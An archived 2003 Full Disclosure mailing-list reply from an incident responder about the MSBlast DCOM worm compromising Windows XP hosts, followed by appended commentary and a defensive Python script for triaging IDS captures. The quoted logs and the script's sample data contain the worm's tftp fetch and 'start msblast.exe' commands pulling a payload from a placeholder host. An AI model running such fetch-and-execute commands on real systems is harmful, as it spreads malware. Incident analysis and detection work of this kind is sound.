Full Disclosure mailing list archives
Re: DCOM Worm?
From: Jordan Wiens <jwiens () nersp nerdc ufl edu>
Date: Mon, 11 Aug 2003 19:29:05 -0400 (EDT)
On Mon, 11 Aug 2003, Carl Sager wrote:
> Aha! The worm is using the 2k offsets and corrupts the DCOM RPC service on XP, which makes the OS automatically shut down after 1 minute. Patch up or use a firewall (or well, just tell any ignorant end users to do so) and you'll be good!
You sure about that? I'm seeing it compromise XP hosts as well. Maybe it randomly switches between offsets? In fact, IDS logs from our first compromised host:

Microsoft Windows XP [Version 5.1.2600]
Microsoft Windows XP [Version 5.1.2600]
tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
{D}{A}
(C) Copyright 1985-2001 Microsoft Corp.{D}{A}
{D}{A}
C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
{D}{A}
(C) Copyright 1985-2001 Microsoft Corp.{D}{A}
{D}{A}
C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
start msblast.exe{A}
start msblast.exe{A}
msblast.exe{A}
msblast.exe{A}

--
Jordan Wiens, CISSP
UF Network Incident Response Team
(352)392-2061

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
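The capture above is the kind of evidence a responder uses to settle the question in the thread: a cmd.exe banner naming the OS version, followed by a tftp fetch and a start of the fetched file, shows a working foothold rather than a host that merely crashed. The following Python triage script is an added example, not code from Jordan's post or from the list; it assumes the IDS writes `{A}` for a line feed and `{D}` for a carriage return (the escaping seen in the quoted log), and the sample captures, the `aaa.bbb.ccc.ddd` placeholder and the Windows 2000 banner are constructed here for illustration.

```python
import re

# Token notation used by the IDS capture in the post: {A} is taken to be a
# line feed and {D} a carriage return (assumption about the IDS's escaping).
CTRL_TOKENS = {"{A}": "\n", "{D}": "\r"}

# Constructed sample captures in that notation. The first mirrors the shape of
# the XP capture quoted above; the 2000 banner and the banner-only capture are
# constructed for contrast. The tftp host is the post's own placeholder.
CAPTURE_XP = (
    "Microsoft Windows XP [Version 5.1.2600]{D}{A}"
    "(C) Copyright 1985-2001 Microsoft Corp.{D}{A}"
    "{D}{A}"
    "C:\\WINDOWS\\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}"
    "tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}"
    "start msblast.exe{A}"
    "msblast.exe{A}"
)
CAPTURE_2000 = (
    "Microsoft Windows 2000 [Version 5.00.2195]{D}{A}"
    "(C) Copyright 1985-2000 Microsoft Corp.{D}{A}"
    "C:\\WINNT\\system32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}"
    "start msblast.exe{A}"
)
# A banner with no follow-up command: a shell opened but nothing was fetched,
# which is what a host that crashed or rebooted right after the exploit looks like.
CAPTURE_BANNER_ONLY = "Microsoft Windows XP [Version 5.1.2600]{D}{A}{D}{A}"

BANNER_RE = re.compile(
    r"Microsoft Windows (?P<product>\S+) \[Version (?P<version>[\d.]+)\]"
)
TFTP_RE = re.compile(
    r"\btftp\s+-i\s+(?P<host>\S+)\s+GET\s+(?P<file>\S+)", re.IGNORECASE
)
START_RE = re.compile(r"^\s*start\s+(?P<file>\S+)", re.IGNORECASE | re.MULTILINE)


def decode_capture(raw):
    """Turn the IDS's {A}/{D} tokens back into real line endings."""
    for token, char in CTRL_TOKENS.items():
        raw = raw.replace(token, char)
    return raw


def analyze_capture(raw):
    """Extract the OS banner, tftp fetches and launched files from one capture."""
    text = decode_capture(raw)
    report = {
        "os": None,
        "version": None,
        "tftp_hosts": [],
        "fetched": [],
        "started": [],
        "compromised": False,
    }
    banner = BANNER_RE.search(text)
    if banner:
        report["os"] = banner.group("product")
        report["version"] = banner.group("version")
    # The IDS repeats lines, so deduplicate while keeping first-seen order.
    for m in TFTP_RE.finditer(text):
        if m.group("host") not in report["tftp_hosts"]:
            report["tftp_hosts"].append(m.group("host"))
        if m.group("file") not in report["fetched"]:
            report["fetched"].append(m.group("file"))
    for m in START_RE.finditer(text):
        if m.group("file") not in report["started"]:
            report["started"].append(m.group("file"))
    # A banner alone may be a crashed or merely probed host; a banner followed by
    # a tftp fetch and a start of the fetched file is a working foothold.
    report["compromised"] = bool(banner) and any(
        f in report["fetched"] for f in report["started"]
    )
    return report


def summarize(captures):
    """Count working footholds per OS banner across a batch of captures."""
    counts = {}
    for raw in captures:
        r = analyze_capture(raw)
        if r["compromised"]:
            key = f"{r['os']} {r['version']}"
            counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for name, cap in [("xp", CAPTURE_XP), ("2000", CAPTURE_2000),
                      ("banner-only", CAPTURE_BANNER_ONLY)]:
        print(name, analyze_capture(cap))
    print(summarize([CAPTURE_XP, CAPTURE_2000, CAPTURE_BANNER_ONLY]))
```

Run over a directory of IDS payload captures, `summarize` gives a per-OS count of hosts that actually reached the fetch-and-start stage, which is the number worth comparing against the list of hosts that only rebooted. The tftp server addresses collected in `tftp_hosts` are the other useful output: each one is an already-infected machine on the network that should be isolated.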